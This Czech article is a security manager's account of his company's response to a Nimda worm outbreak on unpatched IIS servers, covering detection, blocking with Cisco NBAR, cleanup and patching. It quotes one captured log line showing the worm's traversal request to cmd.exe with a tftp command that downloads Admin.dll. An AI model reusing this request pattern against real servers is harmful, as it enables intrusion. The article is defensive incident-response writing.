Co dělat, když se do vás zakousne Nimda

Náš manažer bezpečnosti IT opět změnil místo a hned musel čelit rozsáhlému útoku známého červa. Tak jsem to ud


Náš manažer bezpečnosti IT opět změnil místo a hned musel čelit rozsáhlému
útoku známého červa.
Tak jsem to udělal zas. Změnil jsem místo. Ukončil jsem pracovní vztah se svým
předchozím zaměstnavatelem a nastoupil do high-tech firmy. Pověřili mě, abych
pomohl vytvořit návrh architektury a technické řešení nové bezpečnostní
infrastruktury IT. Stávající bezpečnostní infrastruktura firmy vyžaduje mnoho
změn. Ještě před rokem jsme měli méně než 1 000 zaměstnanců. Dnes jejich počet
přesáhl 7 000. Nemáme zavedenou žádnou bezpečnostní politiku, naše specifikace
bezpečnostních pravidel pro firewall přesahuje 1 500 řádků a chybí nám
spolehlivý centrálně řízený mechanismus kontroly přístupu, nástroje pro
bezpečnostní audit a přiměřená ochrana proti virům. A navíc jsme byli zasaženi
masivní invazí červa Nimda, takže jsme museli rychle jednat a vymyslet vhodný
způsob, jak pohotově zasáhnout do běžícího systému.

Červ
Červ Nimda byl poprvé odhalen v září loňského roku a jeho největší záludnost
spočívá v tom, že k šíření po celém internetu používá více metod. Jedním ze
způsobů je útok na webové servery, kde běží Microsoft Internet Information
Server (IIS) bez potřebných záplat. Nimda prozkoumá řadu známých slabých míst
IIS, a hned jak se usídlí na některém serveru, začne pátrat v internetu po
dalších napadnutelných webových serverech a celý proces potom zopakuje.
Dalším způsobem invaze jsou útoky na sítě LAN. Po napadení oběti serveru přidá
Nimda do skupiny správců jeden účet pro hosta. A protože je obecným pravidlem,
že kdokoli se přihlásí do systému jako host, nepotřebuje heslo, může se
kterýkoliv uživatel připojený na internet nalogovat do otevřeného (a tedy
ohroženého) systému, a ten je mu vydán všanc. Po přihlášení mohou útočníci
libovolně číst soubory a v některých případech mohou vzdáleně ovládat server.

Útok začíná
Útok Nimdy začal kombinací dvou událostí. Tou první byla série e-mailových
zpráv od několika poskytovatelů externích internetových služeb a také od
několika komerčních internetových firem. Zprávy obsahovaly informace o četném
prohledávání portů, ke kterému došlo v jejich infrastruktuře. IP adresy všech
pokusů prohledávání byly podle těchto e-mailů registrovány na naši firmu. A
navíc, skenování portů bylo namířeno pouze proti jejich portu 80 (HTTP) a proti
ničemu jinému. To bylo trochu záhadné, protože nestandardní skenování portů (se
zlým úmyslem) bývá obvykle namířeno proti většímu množství různých portů v síti.
Druhá událost nastala ve chvíli, kdy si pracovníci v našem síťovém operačním
centru všimli velkého množství odeslaných zpráv nebo zpráv připravených k
odeslání a také opakovaného výpadku serveru. Po tomto zjištění jsme nasadili
jeden volný linuxový systém, aby monitoroval určitý síťový segment, na nějž
jsme měli podezření, že je zdrojem útoků. V současné době bohužel ještě nemáme
zavedenou infrastrukturu pro detekci napadení, ale linuxový stroj byl v té
chvíli rychlým, efektivním a ekonomicky výhodným prostředkem k prověření
provozu v síti. Naši síťoví technici konfigurovali jeden ethernetový přepínací
port v režimu Switched Port Analyzer, aby monitoroval provoz ve vnitřním
rozhraní našeho hlavního firewallu. Usoudili jsme, že to je správný bod pro
sledování e-mailového provozu směřujícího ven z naší sítě. Ale objem provozu
byl tak velký, že jsme nakonec nasadili filtry k identifikaci a zachycení
výhradně provozu HTTP směřujícího ven. Velice rychle jsme pak zjistili, co se
vlastně děje.

Co se děje
Výpis z logů nám odhalil následující data:
/_vti_bin/ ..%255c../..%255c../winnt/
system32/cmd.exe?/c+tftp%20-i%20X.X.X.X
%20GET %20Admin.dll%20d:Admin.dll.
Dekódovaný paket (kde znaky X reprezentují IP adresu našeho napadeného serveru)
jasně prokázal napadení serveru Nimdou. Zápis "%255c" kombinovaný se zápisem
"cmd.exe" byl dostatečným důkazem ke stanovení pozitivní diagnózy.
S určitým úsilím se nám podařilo vygenerovat seznam všech napadených hostitelů
v naší síti. Jejich počet dosahoval několika stovek! Mezi hostiteli byly síťové
servery, které provozují aplikace e-commerce a podílejí se na vytváření příjmů
firmy. V některých případech to byly vývojové stanice. Zbývající množství
hostitelů zahrnovalo servery zajišťující technickou podporu a jednotlivé
desktopy. Dalším problémem k řešení byla skutečnost, že naše desktopové
počítače používají DHCP (Dynamic Host Configuration Protocol), který přiděluje
náhodné IP adresy klientům v síti pokaždé, kdy se některý klient přihlásí. A
proto je pravděpodobné, že i v případě, kdy se nám podařilo vysledovat
podezřelou IP adresu až k určitému zařízení, nemusel to být právě ten desktop,
který byl původně označen ve výpisu logu.

Nic neodpojovat
Museli jsme okamžitě jednat. Nevypadá to dobře, když se ostatní firmy dozvědí,
že máte problém s Nimdou. Nemohli jsme ale prostě vytáhnout zástrčku ze zásuvky
a vypojit náš firemní server, který je jedním z našich hlavních zdrojů příjmů.
Vzhledem k používanému protokolu DHCP (dynamického přidělování IP adres) bylo
navíc pravděpodobné, že v době, kdy bychom najisto identifikovali určitý
napadený server, by mohla být už jeho IP adresa mezitím změněná.
Svolali jsme proto pohotovostní poradu s našimi síťovými techniky a
prodiskutovali možnost zapojit nástroj NBAR od společnosti Cisco, určený k
prověření síťových aplikací, ve všech našich routerech. NBAR, který je součástí
Cisco IOS (Internetworking Operating System), vám umožní konfigurovat speciální
přístupové seznamy, které vyhledávají a blokují určité pakety na základě
datového obsahu. S aktivací NBAR jsme ale riskovali jistou degradaci sítě,
neboť daný router by musel prohledat každý paket podle specifických klíčových
slov. V ideálním případě mají routery směrovat pakety, a filtrace podle obsahu
je záležitostí aplikačních proxy. Se všemi zdroji, které jsme měli k dispozici,
se nám přesto jevilo zavedení NBAR jako nejrychlejší řešení prevence útoků
Nimdy pakety odcházejícími z naší sítě. Toto opatření neřešilo náš problém
interně, ale měli jsme alespoň možnost zabránit útokům, které by se šířily na
další servery v ostatních firmách.

Čištění a záplaty
Dalším krokem bylo vyčištění našich serverů a instalování potřebných záplat.
Přečtete-li si doporučení vydaná poskytovateli antivirových programů nebo
koordinačním centrem CERT, dozvíte se, že doporučují uvést IIS server do režimu
off-line a reinstalovat operační systém. Je to dobrá teorie, ale v praxi jsou
situace, kdy si jednoduše nemůžete dovolit vypnout firemní server. Naštěstí je
možné vyčistit infikovaný server bez nutnosti nové instalace operačního
systému. Stále však platí, že musíte systém rebootovat, pokud vyměníte některé
soubory DLL Windows (Dynamic Link Library). Nám se podařilo vymýtit Nimdu z
našich serverů a ochránit je před dalším napadením tím, že jsme se řídili
pokyny CERT a instalovali jsme nejnovější antivirový program, spustili
skenování a instalovali potřebné záplaty a to všechno bez nutnosti rebootovat
server. Teď jsme zase čistí. Celý proces vyžadoval čas šesti správců Windows NT
po dobu skoro pěti dnů. Mým dalším záměrem je pořídit web proxy server a jako
dodatečnou ochranu proti škodlivým kódům zavést filtraci obsahu.

Užitečné webové odkazy
- Na adrese www.cisco.com/warp/public/63/nimda.shtml se dozvíte, jak použít
speciální síťový identifikační nástroj aplikací od Cisca k zablokování paketů
Nimdy.
- Stránka CERT advisory (www.cert.org/advisories/CA-2001-26.html) poskytující
podrobnosti o červu Nimda.
- Earlybird je volně nabízený reportovací nástroj, poskytující v reálném čase
informace o červech v síti. Hlídá webové logy, identifikuje podezřelou činnost
a automaticky vytvoří a odešle e-mailovou zprávu o zjištěné události do sítě,
odkud došlo k narušení. Zpráva obsahuje IP adresu útočícího systému a
dekódovaný řetězec z došlého paketu. Earlybird naleznete na
www.treachery.net/~jdyson/earlybird/.
- Téměř každá varianta Unixu nabízí utilitu, která podporuje možnost
konfigurace síťové karty serveru tak, aby server sledoval provoz v síti.
Výborně zpracovaný příspěvek The Secrets of Snoop (Tajemství Snoopu) Lance
Spitznera na adrese www.enteract.com/~lspitz/snoop.html vás zasvětí do práce s
nástrojem Solaris Snoop, který slouží tomuto účelu.









Komentáře
K tomuto článku není připojena žádná diskuze, nebo byla zakázána.